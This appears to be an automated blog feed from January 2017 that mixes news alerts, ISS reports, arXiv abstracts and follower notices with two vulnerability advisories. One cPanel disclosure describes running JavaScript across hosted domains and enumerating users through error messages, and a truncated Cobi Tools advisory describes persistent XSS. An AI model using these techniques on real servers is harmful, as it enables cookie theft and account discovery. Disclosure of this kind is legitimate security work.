===[ Introduction ]=== cPanel offers web hosting software that automates the intricate workings of web hosting servers. cPanel equips server administrators with the necessary tools to provide top-notch hosting to customers on tens of thousands of servers worldwide. ===[ Description ]=== I) Cross Domain Scripting : A local user can run JavaScript code in other user's domain and access cookies and compromise the victim website. POC : User "hacker" makes ".htmltemplates" directory in hacker's homepage (/home/hacker/.htmltemplates/) and makes "exploit" file containing JavaScript. Now this script can be called from hacker's domain (hacker.com) : http://ift.tt/2iJ1qNs But, the script is also accessible from other hosted domains (for example victim.com) : http://ift.tt/2jGiJD3 Here, the hacker's code is running in another domain's area and victim.com's cookies can be read. A demonstrative video for this vulnerability can be found here : http://ift.tt/2iJ8Lgb II) Find existing system users : Any unauthorized visitor can find valid system users. POC : If the hacker calls "entropysearch.cgi" script with an invalid username, the error message will be : "Could not chdir into /.htmltemplates: No such file or directory" http://ift.tt/2jGjKex But if the hacker calls "entropysearch.cgi" script with a valid username, the error message will be : "Could not chdir into /home/victim/.htmltemplates: No such file or directory" http://ift.tt/2iJ4IjV The hacker can make a dictionary attack to find several valid usernames. III) Find user's homepage : If a hacker knows the username, then user's homepage address can be found. POC : http://ift.tt/2jGoQXX : "Could not chdir into /home2/victim/.htmltemplates: No such file or directory" This can be useful for further attacks. ===[ Patching ]=== cPanel believes that these are not security vulnerabilities, so the issue already exist in. ===[ Timeline ]=== [06/12/2016] - Vendor notified [06/12/2016] - Vendor verified reception of the report [09/12/2016] - Vendor responded that these are not security vulnerabilities [10/12/2016] - POC video sent to vendor explaining the severity of cross domain scripting vulnerability [06/01/2017] - No response from vendor, so vendor was contacted again [11/01/2017] - No response from vendor, public disclosure ===[ Credits ]=== Vulnerabilities have been discovered by Omid @ Open Security. ===[ References ]=== Open Security : http://opensecurity.ca/ Original Advisory : http://ift.tt/2iJ1qNy POC Video : http://ift.tt/2iJ8Lgb

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions

How to anonymously view a private instagram account

How to anonymously view a private instagram account View Private ... Our viewer keeps you completely anonymous and your identity hidden with .

from Google Alert - anonymous http://ift.tt/2ilWn4L
via IFTTT

Jeff Bezos is the anonymous buyer of the biggest house in Washington

Courtesy of George Washington University Museum and the Textile Museum Amazon founder Jeff Bezos is the new owner of the former Textile ...

from Google Alert - anonymous http://ift.tt/2jp5G5K
via IFTTT

Anonymous Woman Playwright Writes Solo Show About Her Sex Life, And Male Comedians ...

An anonymous female voice makes the message so much stronger, and means that any woman who wants to take ownership of it can.” (Her favorite ...

from Google Alert - anonymous http://ift.tt/2jBgk8r
via IFTTT

Anonymous Documentarists

Image slideshow left arrow. Anonymous Documentarists thumbnail 1; Plus. Image slideshow right arrow. Please log in.

from Google Alert - anonymous http://ift.tt/2ipx5G2
via IFTTT

Anonymous

Showing 1-24 of 44 results for “Anonymous”. Sorted by date added, Popularity, Relevance, Release date, Title, Author. Filters. Filter search results.

from Google Alert - anonymous http://ift.tt/2jBgQDt
via IFTTT

Anonymous tip leads to drug bust in PA

More drugs are off the streets in P.A. thanks to an anonymous call to Crime Stoppers. On Wednesday night at 11 p.m., the Prince Albert Police Service ...

from Google Alert - anonymous http://ift.tt/2ipKHRx
via IFTTT

Ravens give newly hired Greg Roman official title of senior assistant tight end coach, source tells Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous donor gives College of Saint Benedict $10 million

An anonymous donor will give $10 million to the College of Saint Benedict to create the Center for Ethical Leadership in Action, which will aim to ...

from Google Alert - anonymous http://ift.tt/2ikX26s
via IFTTT

propaganda minister

And another thing about anonymous sources, one of the great anonymous sources of our era his Kellyanne Conway. She does it every day. She has ...

from Google Alert - anonymous http://ift.tt/2ip4jVZ
via IFTTT

All Addictions Anonymous Meetings

This is a 12 step meeting open to all who would like help with an addiction. There is no fee for attendance.

from Google Alert - anonymous http://ift.tt/2il18vv
via IFTTT

Phone-Hacking Firm Cellebrite Got Hacked; 900GB Of Data Stolen

The company that sells digital forensics and mobile hacking tools to others has itself been hacked. Israeli firm Cellebrite, the popular company that provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had 900 GB of its data stolen by an unknown hacker. But the hacker has not yet publicly released anything from the stolen data


from The Hacker News http://ift.tt/2iLCuoN
via IFTTT

Sneak Preview: Deep Learning for Computer Vision with Python

Wow, the Kickstarter launch date of January 18th is approaching so fast!

I still have a ton of work to do and I’m neck-deep in Kickstarter logistics, but I took a few minutes earlier today and recorded this sneak preview of Deep Learning for Computer Vision with Python just for you:

dl_ks_videoThe video is fairly short at only 2m51s, and it’s absolutely worth the watch, but if you don’t have enough time to watch it, you can read the gist below:

  • 0m09s: I show the output of training AlexNet from scratch on the massive ImageNet dataset — which I’ll be showing you exactly how to do inside my book.
  • 0m37s: I discuss how this book has one goal: to help developers, researchers, and students just like yourself become experts in deep learning computer vision.
  • 0m44s: Whether this is the first time you’ve worked with deep learning and neural networks or you’re already a seasoned deep learning practitioner, this book is engineered from the ground up to help you reach expert status.
  • 0m58s: I provide a high level overview of the topics that will be covered inside my deep learning for computer vision book.
  • 1m11s: I reveal the programming language (Python) and the libraries we’ll be using (Keras and mxnet) to build deep learning networks.
  • 1m24s: Since we’ll be covering a massive amount of topics, I’ll be breaking the book down into volumes called “bundles”. You’ll be able to choose a bundle based on how in-depth you want to study deep learning, along with your particular budget.
  • 1m38s: Each bundle will include the eBook files, video tutorials and walkthroughs, source code listings, access to the companion website, and a downloadable pre-configured Ubuntu VM.
  • The Kickstarter campaign will be going live on Wednesday, January 18th at 10AM EST — I hope to see you on the Kickstarter backer list.

Like I said, if you have the time, the sneak preview is definitely worth the watch.

And I hope that you support the Deep Learning for Computer Vision with Python Kickstarter campaign on Wednesday, January 18th at 10AM EST — if you’re serious about becoming a deep learning expert, then this book will be the perfect fit for you!

To be notified when more Kickstarter announcements go live, be sure to signup for the Kickstarter notification list!

The post Sneak Preview: Deep Learning for Computer Vision with Python appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2jAwdMC
via IFTTT

Anonymous Man Icon

Anonymous Man Icon. Anonymous Man Icon · Medical Service Graphic Design, Vector Illustration. Healthcare / Medical · Robot Electric Avatar Icon.

from Google Alert - anonymous http://ift.tt/2iLbDt2
via IFTTT

ISS Daily Summary Report – 1/11/2017

Extravehicular Activity (EVA) Preparation:  Today, the USOS crew continued preparing tools that will be used during Friday’s EVA, which will support the upgrade from Nickel Hydride Channel 1A batteries to Lithium Ion batteries. The crew verified that the Simplified Aid for EVA Rescue (SAFERs) are functional, and configured two cameras that will be used during the EVA. The crew also performed a final EVA procedure review. US EVA #39 is scheduled for Friday, January 13th with Joint Airlock Egress occurring at ~6:15am CST.  Mobile Servicing System (MSS) Operations:  Yesterday and overnight (GMT 010-011), the Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm1 as required to use SPDM Arm1 to remove the 1A-3 Nickel-Hydrogen (NiH2) battery from its slot in the 1A Integrated Electronics Assembly (IEA).  They then maneuvered the SSRMS and SPDM as required to use SPDM Arm2 to unstow a Lithium-Ion (Li-Ion) battery from slot F of the H-II Transfer Vehicle 6 (HTV6) Exposed Pallet (EP) and install it in slot 3 of the 1A IEA.  Next they unstowed the Robotic Offset Tool (ROST) from the SPDM Tool Holder Assembly (THA) and attempted to fasten the H1 bolt of the 1A slot 5 battery, but the ROST socket was not able to engage the H1 bolt. An activity will be added to allow EVA crewmembers to fasten this H1 bolt during the upcoming EVA. To back away the ROST from the H1 fixture, pull force needed to be increased up to 70 N. Then, the same attempt was performed on 1A slot 1 and after pushing with a higher force (110 N) when fastening with the ROST socket, the H1 bolt was successfully bolted. However, when trying to pull the ROST away from H1 fixture with the maximum force allowed (110 N), ROST stayed stuck on the fixture and forces and moments sensed were not expected. After multiple attempts to pull it off, ROST was finally released after unfastening slightly the ROST Socket.  Finally the Robotics Ground Controllers maneuvered the SSRMS and SPDM to a park position. Biomolecule Sequencer (BMS) Sample Stop: On Monday, the crew initiated the final BMS run off of the tasklist.  Today, the crew completed the 48-hour sample session. To complete the analysis the crew captured a screenshot of the Surface Pro 3, then downlinked the image to the ground for the BMS team to evaluate. The goals of the BMS experiment are to provide a proof-of-concept for the functionality and evaluate crew operability of a DNA sequencer in a space/microgravity environment. The capability for sequencing of DNA in space could provide for a better ability to identify microbes in real-time, instead of requiring sample return and ground based analysis.  Human Research Collections: This morning the crew continued their urine collection and performed a blood collection in support of several Human Research experiments today. Samples for the Biochemical Profile, Repository, and Cardio Ox were collected and stowed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. Repository is a storage bank used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions. Cardio Ox determines whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Cardio Ox Ultrasound: In addition to fluid collections, today’s Flight Day 60 (FD60) Cardio Ox session included ultrasound and Electrocardiogram (ECG) measurements.  With scanning assistance from a Crew Medical Officer (CMO) and ground remote guidance specialists, the crew donned ECG electrodes, and marked the Carotid and Brachial arteries to make locating them easier when scanning.  By collecting ultrasound and ECG data, paired with blood and urine samples, scientists are trying to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts.  Habitability Narrated Task: In support of the Habitability experiment, the crew performed a narrated video of nominal on-orbit tasks which give unique insight into the day in the life of an ISS crew member. Today’s narrated video was of meal preparation, including using the food warmer, reconstituting drinks and setting up eating areas. Observations documented through an iPad application help characterize the ways crew members live and work in microgravity, and how their interactions with their environment might require different layouts, additional space, or other alterations to future manned space vehicles. Radiation Dosimetry Inside ISS-Neutron (RaDI-N): After retrieving the RaDI-N hardware from the Russian crewmembers, a USOS crewmember deployed eight Space Bubble Detectors around the ISS for the Radi-N2 experiment. The Canadian Space Agency (CSA) RaDI-N investigation will be conducted by measuring neutron radiation levels while onboard the ISS. RaDI-N uses bubble detectors as neutron monitors which have been designed to only detect neutrons and ignore all other radiation.  External (EXT) Multiplexer/Demultiplexer (MDM) Upgrade: The crew configured a new Enhanced Processor and Integrated Communications (EPIC) EXT MDM by removing two circuit cards from a donor MDM and installing them, plus an additional spare card, into the spare EXT MDM. The MDM Front Cover was then exchanged for an EXT MDM Ethernet Cover. EPIC MDMs feature faster processors, increased memory, and an Ethernet port for data output, allowing for the simultaneous operation of a greater number of experiments.  The upgraded EXT MDM is scheduled to be installed […]

from ISS On-Orbit Status Report http://ift.tt/2j4E46b
via IFTTT

Ravens: Former Bills OC Greg Roman joining coaching staff, with official duties still to be determined - Adam Schefter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Lars
Devoted to Business Transformation & Knowledge Management in the Era of Cloud and Big Data
Deutschland
https://t.co/ivnXUNovJN
Following: 160 - Followers: 147

January 12, 2017 at 03:12AM via Twitter http://twitter.com/NoggleOnline

I have a new follower on Twitter


Lesley Thomas
#Actress turned #Indie #Filmmaker working on first #Horror #Zombies #Shortfilm. Please #SupportIndieFilm
Los Angeles, CA

Following: 12326 - Followers: 13112

January 12, 2017 at 01:17AM via Twitter http://twitter.com/LLesleyThomas

Ravens: Owner Steve Bisciotti reiterates team will continue to avoid players with history of domestic violence (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Wednesday, January 11, 2017

I have a new follower on Twitter


Uma Levrone
Retired Model #Digital #Marketing #Consultant #Crowdfunding #Indiegogo #Kickstarter #Startups
Boston, MA

Following: 1880 - Followers: 4992

January 11, 2017 at 10:30PM via Twitter http://twitter.com/UmaLevrone

I have a new follower on Twitter


Evan Carroll
Author, Keynote Speaker and Trainer. Founder @high5conf and @AttendedEvents. Past President @AMATriangle. Alum of @Capstrat, @ChannelAdvisor and @uncsils.
Raleigh, NC
https://t.co/2LF6EpfTeT
Following: 13324 - Followers: 15503

January 11, 2017 at 08:41PM via Twitter http://twitter.com/evancarroll

I have a new follower on Twitter


Servant Leadership
Servant Leadership Implementation Experts
Carlsbad, California
https://t.co/iW7s1iQV1S
Following: 1625 - Followers: 2625

January 11, 2017 at 08:41PM via Twitter http://twitter.com/SLILead

OpenNMT: Open-Source Toolkit for Neural Machine Translation. (arXiv:1701.02810v1 [cs.CL])

We describe an open-source toolkit for neural machine translation (NMT). The toolkit prioritizes efficiency, modularity, and extensibility with the goal of supporting NMT research into model architectures, feature representations, and source modalities, while maintaining competitive performance and reasonable training requirements. The toolkit consists of modeling and translation support, as well as detailed pedagogical documentation about the underlying techniques.



from cs.AI updates on arXiv.org http://ift.tt/2ihYwOR
via IFTTT

Decoding as Continuous Optimization in Neural Machine Translation. (arXiv:1701.02854v1 [cs.CL])

In this work, we propose a novel decoding approach for neural machine translation (NMT) based on continuous optimisation. The resulting optimisation problem can then be tackled using a whole range of continuous optimisation algorithms which have been developed and used in the literature mainly for training. Our approach is general and can be applied to other sequence-to-sequence neural models as well. We make use of this powerful decoding approach to intersect an underlying NMT with a language model, to intersect left-to-right and right-to-left NMT models, and to decode with soft constraints involving coverage and fertility of the source sentence words. The experimental results show the promise of the proposed framework.



from cs.AI updates on arXiv.org http://ift.tt/2j8JFKP
via IFTTT

Context-aware Captions from Context-agnostic Supervision. (arXiv:1701.02870v1 [cs.CV])

We introduce a technique to produce discriminative context-aware image captions (captions that describe differences between images or visual concepts) using only generic context-agnostic training data (captions that describe a concept or an image in isolation). For example, given images and captions of "siamese cat" and "tiger cat", our system generates language that describes the "siamese cat" in a way that distinguishes it from "tiger cat". We start with a generic language model that is context-agnostic and add a listener to discriminate between closely-related concepts. Our approach offers two key advantages over previous work: 1) our listener does not need separate training, and 2) allows joint inference to decode sentences that satisfy both the speaker and listener -- yielding an introspective speaker. We first apply our introspective speaker to a justification task, i.e. to describe why an image contains a particular fine-grained category as opposed to another closely related category in the CUB-200-2011 dataset. We then study discriminative image captioning to generate language that uniquely refers to one out of two semantically similar images in the COCO dataset. Evaluations with discriminative ground truth for justification and human studies for discriminative image captioning reveal that our approach outperforms baseline generative and speaker-listener approaches for discrimination.



from cs.AI updates on arXiv.org http://ift.tt/2jlaNDF
via IFTTT

A Framework for Knowledge Management and Automated Reasoning Applied on Intelligent Transport Systems. (arXiv:1701.03000v1 [cs.AI])

Cyber-Physical Systems in general, and Intelligent Transport Systems (ITS) in particular use heterogeneous data sources combined with problem solving expertise in order to make critical decisions that may lead to some form of actions e.g., driver notifications, change of traffic light signals and braking to prevent an accident. Currently, a major part of the decision process is done by human domain experts, which is time-consuming, tedious and error-prone. Additionally, due to the intrinsic nature of knowledge possession this decision process cannot be easily replicated or reused. Therefore, there is a need for automating the reasoning processes by providing computational systems a formal representation of the domain knowledge and a set of methods to process that knowledge. In this paper, we propose a knowledge model that can be used to express both declarative knowledge about the systems' components, their relations and their current state, as well as procedural knowledge representing possible system behavior. In addition, we introduce a framework for knowledge management and automated reasoning (KMARF). The idea behind KMARF is to automatically select an appropriate problem solver based on formalized reasoning expertise in the knowledge base, and convert a problem definition to the corresponding format. This approach automates reasoning, thus reducing operational costs, and enables reusability of knowledge and methods across different domains. We illustrate the approach on a transportation planning use case.



from cs.AI updates on arXiv.org http://ift.tt/2j8Fgr6
via IFTTT

Towards Smart Proof Search for Isabelle. (arXiv:1701.03037v1 [cs.AI])

Despite the recent progress in automatic theorem provers, proof engineers are still suffering from the lack of powerful proof automation. In this position paper we first report our proof strategy language based on a meta-tool approach. Then, we propose an AI-based approach to drastically improve proof automation for Isabelle, while identifying three major challenges we plan to address for this objective.



from cs.AI updates on arXiv.org http://ift.tt/2jl6W9P
via IFTTT

Exploration: A Study of Count-Based Exploration for Deep Reinforcement Learning. (arXiv:1611.04717v2 [cs.AI] UPDATED)

Count-based exploration algorithms are known to perform near-optimally when used in conjunction with tabular reinforcement learning (RL) methods for solving small discrete Markov decision processes (MDPs). It is generally thought that count-based methods cannot be applied in high-dimensional state spaces, since most states will only occur once. Recent deep RL exploration strategies are able to deal with high-dimensional continuous state spaces through complex heuristics, often relying on optimism in the face of uncertainty or intrinsic motivation. In this work, we describe a surprising finding: a simple generalization of the classic count-based approach can reach near state-of-the-art performance on various high-dimensional and/or continuous deep RL benchmarks. States are mapped to hash codes, which allows to count their occurrences with a hash table. These counts are then used to compute a reward bonus according to the classic count-based exploration theory. We find that simple hash functions can achieve surprisingly good results on many challenging tasks. Furthermore, we show that a domain-dependent learned hash code may further improve these results. Detailed analysis reveals important aspects of a good hash function: 1) having appropriate granularity and 2) encoding information relevant to solving the MDP. This exploration strategy achieves near state-of-the-art performance on both continuous control tasks and Atari 2600 games, hence providing a simple yet powerful baseline for solving MDPs that require considerable exploration.



from cs.AI updates on arXiv.org http://ift.tt/2eYkVir
via IFTTT

Pose-Selective Max Pooling for Measuring Similarity. (arXiv:1609.07042v4 [cs.CV] CROSS LISTED)

In this paper, we deal with two challenges for measuring the similarity of the subject identities in practical video-based face recognition - the variation of the head pose in uncontrolled environments and the computational expense of processing videos. Since the frame-wise feature mean is unable to characterize the pose diversity among frames, we define and preserve the overall pose diversity and closeness in a video. Then, identity will be the only source of variation across videos since the pose varies even within a single video. Instead of simply using all the frames, we select those faces whose pose point is closest to the centroid of the K-means cluster containing that pose point. Then, we represent a video as a bag of frame-wise deep face features while the number of features has been reduced from hundreds to K. Since the video representation can well represent the identity, now we measure the subject similarity between two videos as the max correlation among all possible pairs in the two bags of features. On the official 5,000 video-pairs of the YouTube Face dataset for face verification, our algorithm achieves a comparable performance with VGG-face that averages over deep features of all frames. Other vision tasks can also benefit from the generic idea of employing geometric cues to improve the descriptiveness of deep features.



from cs.AI updates on arXiv.org http://ift.tt/2cVF35F
via IFTTT

I have a new follower on Twitter


Vizury
#GrowthMarketing platform that drives user retention and incremental conversions for #ecommerce, #BFSI and #travel brands.
Bangalore, India
http://t.co/Kud73Anu0Z
Following: 1102 - Followers: 2165

January 11, 2017 at 05:20PM via Twitter http://twitter.com/VizuryOneToOne

I have a new follower on Twitter


Ad Benchmark Index
ABX measures the advertising effectiveness of EVERY new ad across TV, radio, print, Internet, and out-of-home. Your ads. Your competitor's ads. All ads.
White Plains, New York
http://t.co/iOZLG12O1n
Following: 3165 - Followers: 3438

January 11, 2017 at 04:10PM via Twitter http://twitter.com/ABXindex

I have a new follower on Twitter


Jim Berkowitz
Founder of LaunchHawk | Startup Mentoring | Growth Consulting | Developer of the LaunchHawk "PinPoint" Program | Jazz DJ on KOTO-fm | Telluride CO
Telluride CO
https://t.co/IlG1GiTsCw
Following: 14674 - Followers: 18606

January 11, 2017 at 04:10PM via Twitter http://twitter.com/jberkowitz

My Deep Learning Kickstarter will go live on Wednesday, January 18th at 10AM EST

I’ve got some exciting news to share today!

My Deep Learning for Computer Vision with Python Kickstarter campaign is set to launch in exactly one week on Wednesday, January 18th at 10AM EST.

dl_ks_header_ks

This book has only goal — to help developers, researchers, and students just like yourself become experts in deep learning for image recognition and classification.

Whether this is the first time you’ve worked with machine learning and neural, networks or you’re already a seasoned deep learning practitionerDeep Learning for Computer Vision with Python is engineered from the ground up to help you reach expert status.

Inside this book you’ll find:

  • Super practical walkthroughs that present solutions to actual, real-world image classification problems, challenges, and competitions.
  • Hands-on tutorials (with lots of code) that not only show you the algorithms behind deep learning for computer vision, but their implementations as well.
  • A no-bullshit teaching style that is guaranteed to cut through all the cruft and help you master deep learning for image understanding and visual recognition.

As a heads up, over the next 7 days I’ll be posting a few more announcements that you won’t want to miss, including:

Thursday, January 12th:

A sneak preview of the Kickstarter campaign, including a demo video of what you’ll find inside the book.

Friday, January 13th:

The Table of Contents for Deep Learning for Computer Vision with Python. This book is extensive, covering the basics of deep learning all the way up to training large-scale networks on the massive ImageNet dataset. You won’t want to miss this list!

Monday, January 16th:

The full list of Kickstarter rewards (including early bird discounts) so you can plan ahead for which reward you want when the Kickstarter launches.

won’t be posting this list publicly — this reward list is only for PyImageSearch readers who are part of the PyImageSearch Newsletter.

Tuesday, January 17th:

Please keep in mind that this book is already getting a lot of attention, so there will be multiple people in line for each reward level when the Kickstarter campaign launches on Wednesday the 18th. To help ensure you get the reward you want, I’ll be sharing tips and tricks you can use to ensure you’re first in line.

Again, I won’t be posting this publicly either. Make sure you signup for the PyImageSearch Newsletter to receive these tips and tricks to ensure you’re at the front of the line.

Wednesday, January 18th:

The Kickstarter campaign link that you can use to claim your copy of Deep Learning for Computer Vision with Python.

To be notified when these announcements go live, be sure to signup for the Kickstarter notification list!

The post My Deep Learning Kickstarter will go live on Wednesday, January 18th at 10AM EST appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2jE8pLK
via IFTTT

Private temp files are still accessible to anonymous users.

Problem/Motivation Even when a managed file element's #uri_scheme is set to private the temp file is available to anonymous user Steps to reproduce ...

from Google Alert - anonymous http://ift.tt/2idnJ1P
via IFTTT

The 'branding'

Davide Beraldo aims to contribute to the sociological debate on protest movements such as Occupy and Anonymous. He does this by introducing the ...

from Google Alert - anonymous http://ift.tt/2jvQy5O
via IFTTT

Re: [FD] [oss-security] Docker 1.12.6 - Security Advisory

I have a new follower on Twitter


Ben Murray
CFO | Download my free #SaaS #Excel models at https://t.co/DV3V9Ob9dc | Join my SaaS #Metrics group below | #hockey #coffee #golf
Dubuque, IA
https://t.co/AEWG0Wutol
Following: 4603 - Followers: 5030

January 11, 2017 at 08:55AM via Twitter http://twitter.com/BR_Murray

ISS Daily Summary Report – 1/10/2017

Extravehicular Activity (EVA) Preparations:  The crew continued with preparations for the second Battery Upgrade EVA. Today, the crew utilized Dynamic Onboard Ubiquitous Graphics (DOUG) Software to review the translation paths during the upcoming EVA, followed by a conference with ground specialists to answer any questions. Ground teams continued to monitor the discharge of the Channel 1A batteries.  The second of the two EVAs to replace the Channel 1A/3A batteries is scheduled Friday, January 13th. Mobile Servicing System (MSS) Operations:  Yesterday and overnight (GMT 009-010), the Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm2 as required to unstow the Lithium-Ion (Li-Ion) battery from slot E of the H-II Transfer Vehicle 6 (HTV6) Exposed Pallet (EP) and installed it in slot 5 of the 1A Integrated Electronics Assembly (IEA).   They then removed the 1A-1 NiH2 battery from its slot on the 1A IEA and stowed it in slot C of the HTV6 EP.  Next they unstowed the Li-Ion battery from slot D of the HTV6 EP and installed it in slot 1 of the 1A IEA.  Finally the Robotics Ground Controllers maneuvered the SSRMS and SPDM to a park position. Multi-Omics Collections: This morning the crew performed sampling in support of the JAXA Multi-Omics experiment. Various samples were collected and stowed in MELFI four times throughout the crew’s on-orbit duration in addition to a questionnaire and ingestion of fructooligosaccharide (FOS). The objective of Multi-Omics is to understand the gut ecosystem of astronauts in the space environment, especially focusing on the immune dysfunction, and to evaluate the impact of fructooligosaccharide (FOS).  Lighting Effects Meter Reading: Today the crew setup and configured the Light Meter hardware and took readings in various locations across the ISS.  The measurements were taken using light from the legacy General Luminaire Assemblies (GLAs), the upgraded Solid State Lighting Assemblies (SSLAs), ambient light from the Cupola, and a dark reading with lights off in a specified module.  The Lighting Effects experiment hopes to better quantify and qualify how lighting can effect habitability of spacecraft. The light bulbs on the ISS are being replaced with a new system designed for improved crew health and wellness. The Lighting Effects investigation studies the impact of the change from fluorescent light bulbs to solid-state light-emitting diodes (LEDs) with adjustable intensity and color and aims to determine if the new lights can improve crew circadian rhythms, sleep, and cognitive performance. Results from this investigation also have major implications for people on Earth who use electric lights.  Human Research Collections: A crewmember performed Flight Day 60 urine collections in support of several Human Research experiments today. Samples for the Biochemical Profile, Repository, and Cardio Ox were collected and stowed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. Repository is a storage bank used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions. Cardio Ox determines whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts.  Today’s Planned Activities All activities were completed unless otherwise noted. HRF Generic Urine Collection HRF Generic Sample MELFI Insertion Operations Membrane Filter-Separator (МФР) water fill. Photo TV GoPro Battery Charging Multi Omics Fecal Sample Operations UPA Brine Filter Gather DAN. Experiment Operator Assistance Urine Processor Assembly (UPA) Brine Filter Changeout Fine Motor Skills Experiment Test Multi Omics Fecal Sample MELFI Insertion Multi Omics Fecal Stow Multi Omics Item Gathering Fine Motor Skills Experiment Test – Subject On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test RELAKSATSIYAHardware Setup. WSTA Fill В1, В2 Fan Screen Cleaning in DC1 HRF Generic Urine Collection Hardware stowage for disposal in Progress 433 (DC1) and IMS updates HRF Generic Sample MELFI Retrieval Insertion Operations RELAKSATSIYA. Parameter Settings Adjustment. RELAKSATSIYA. Observation.  Crew reseats current MSG hard drive. RELAKSATSIYA. Closeout Ops and Hardware Removal. Photo TV GoPro Setup Photodocumentation of the EPO Pesquet Ceres Extravehicular Mobility Unit (EMU) Resize HRF Generic Urine Collection HRF Generic Sample MELFI Insertion Operations Public Affairs Office (PAO) High Definition (HD) Config LAB Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab Checkout of ВП-2 Pilot’s Sight and Comm Interfaces. Cleaning fan screens on FGB interior panels (116, 316, 231, 431) Regenerative Environmental Control and Life Support System (RGN) WSTA Fill ESA Weekly crew conference Extravehicular Activity (EVA) Procedure Review Checkout of the Wide Angle Vertical Sight (ВШТВ). Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ. Filling and Separation of ЕДВ-СВ No.1162 (00063575R, ФГБ1ПГО_1_109) from ЕДВ No.1263 (00058344R, ФГБ1ПГО_1_109). Scheduled PUMA Checkout. СОЖ maintenance Portable Onboard Computers (POC) Dynamic Onboard Ubiquitous Graphics (DOUG) Software Review Extravehicular Activity (EVA) Procedure Conference Rechargeable EVA Battery Assembly (REBA) Installation HRF Generic Urine Collection Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout HRF Generic Sample MELFI Retrieval Insertion Operations Charging EVA Camera D4 Battery HRF Generic Frozen Blood Collection Setup RELAKSATSIYA. Charging battery for Relaksatstiya experiment (initiate) Completed Task List Items SSC-6 Connect [Completed Saturday] EMU Resize [Completed Sunday] EVA Procedure Review [Completed Sunday] MSL-SQF Sample Cartridge MPC Verification [Completed Sunday] JEM Camera Audio Configure [Completed Sunday] COL1O2 Cleanup [Completed Sunday] Express Rack Drawer M1 Audit [Completed Sunday] SSC-8 Vent Clean [Completed Sunday] EHDC Wanted Poster [Completed Sunday] Super Bowl Messages [Completed Sunday] EXT MDM Hardware Gather [Completed Monday] Retrieve Biomolecule Sequencer Flow Cell from MELFI […]

from ISS On-Orbit Status Report http://ift.tt/2j626j8
via IFTTT

I have a new follower on Twitter


Eric Kimberling
Founder of Panorama Consulting, world's leading independent #ERP consulting firm: selection, implementation, #digitaltransformation, org change, expert witness.
Denver, Colorado
https://t.co/BiPgdOQZC7
Following: 2572 - Followers: 5493

January 11, 2017 at 08:25AM via Twitter http://twitter.com/erickimberling

Browser AutoFill Feature Can Leak Your Personal Information to Hackers

Just like most of you, I too really hate filling out web forms, especially on mobile devices. To help make this whole process faster, Google Chrome and other major browsers offer "Autofill" feature that automatically fills out web form based on data you have previously entered in similar fields. However, it turns out that an attacker can use this autofill feature against you and trick you


from The Hacker News http://ift.tt/2ij5KVY
via IFTTT

Secure Your Enterprise With Zoho Vault Password Management Software

Recent data breaches have taught us something very important — online users are spectacularly bad at choosing their strong passwords. Today majority of online users are vulnerable to cyber attacks, not because they are not using any best antivirus or other security measures, but because they are using weak passwords that are easy to remember and reuse same passwords on multiple accounts and


from The Hacker News http://ift.tt/2iEYMZ7
via IFTTT

[FD] Cobi Tools v1.0.8 iOS - Persistent Web Vulnerability

Document Title: =============== Cobi Tools v1.0.8 iOS - Persistent Web Vulnerability References (Source): ==================== http://ift.tt/2j37vHY Release Date: ============= 2017-01-10 Vulnerability Laboratory ID (VL-ID): ==================================== 2028 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Cobi Tools allows your testers to e-mail their UDID from their phone. Console logs can also be emailed for debug assistance. For a more focused log, you can select various debug items to copy and email. (Copy of the Homepage: http://ift.tt/2icpQD0 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the obi Tools v1.0.8 apple ios mobile application. Vulnerability Disclosure Timeline: ================================== 2017-01-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cobi Interactive Product: Cobi Tools - Mobile Application 1.0.8 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the cobi tools v1.0.8 apple ios mobile application. The vulnerability allows an attacker to inject own malicious script codes persistent on the application-side to compromise. The persistent web vulnerability is located in the `devicename` parameter of the `eventlog email` module. Attackers are able to inject malicious script code as `devicename` to provoke an execution within the `email body message` context. The injection point is the devicename 